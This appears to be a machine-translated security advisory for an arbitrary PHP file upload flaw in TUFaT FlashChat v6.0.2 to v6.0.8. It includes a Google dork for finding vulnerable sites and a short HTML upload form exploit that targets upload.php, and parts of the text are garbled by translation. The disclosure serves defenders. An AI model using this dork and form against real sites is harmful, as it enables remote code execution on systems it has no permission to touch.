Release date: 2013-10-04
Updated on: 2013-11-02
Affected Systems:
TUFaT Flashchat v6.0.8
TUFaT Flashchat v6.0.7
TUFaT Flashchat v6.0.6
TUFaT Flashchat v6.0.5
TUFaT Flashchat v6.0.4
TUFaT Flashchat v6.0.2
Description:
--------------------------------------------------------------------------------
Bugtraq id: 62852
FlashChat is a personalized chat room that supports most CMS systems in PHP format and can also be used as independent chat rooms.
Upload of FlashChat. the php script does not properly verify or filter user-uploaded files by uploading. PHP file. The remote system replaces the files in the accessible path. By directly accessing the uploaded files, the remote user can execute arbitrary code.
<* Source: x-hayben21
Link: http://www.osvdb.org/98233
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
######################################## ###############
# Exploit Title: FlashChat File Upload Vulnerability
# Google Dork: intitle: FlashChat v6.0.8
# Date: 02.10.2013
# Exploit Author: x-hayben21
# Vendor Homepage: www.punish3r.com
# Software Link: http://www.tufat.com/script2.htm
# Version: v6.0.8, v6.0.2, v6.0.4, v6.0.5, v6.0.6, v6.0.7,
# Tested on: Windows, PHP 5.2
#
# Special Thanks: MaXtoR-PoLoNia
######################################## ###############
# Vulnerable File: upload. php
# Exploit
<Form action = "http: // sites/script/upload. php" method = "post" enctype = "multipart/form-data">
<Label for = "file"> Filename: </label>
<Input type = "file" name = "file" id = "file"> <br>
<Input type = "submit" name = "submit" value = "Submit">
</Form>
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
TUFaT
-----
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
Http://www.tufat.com/index.php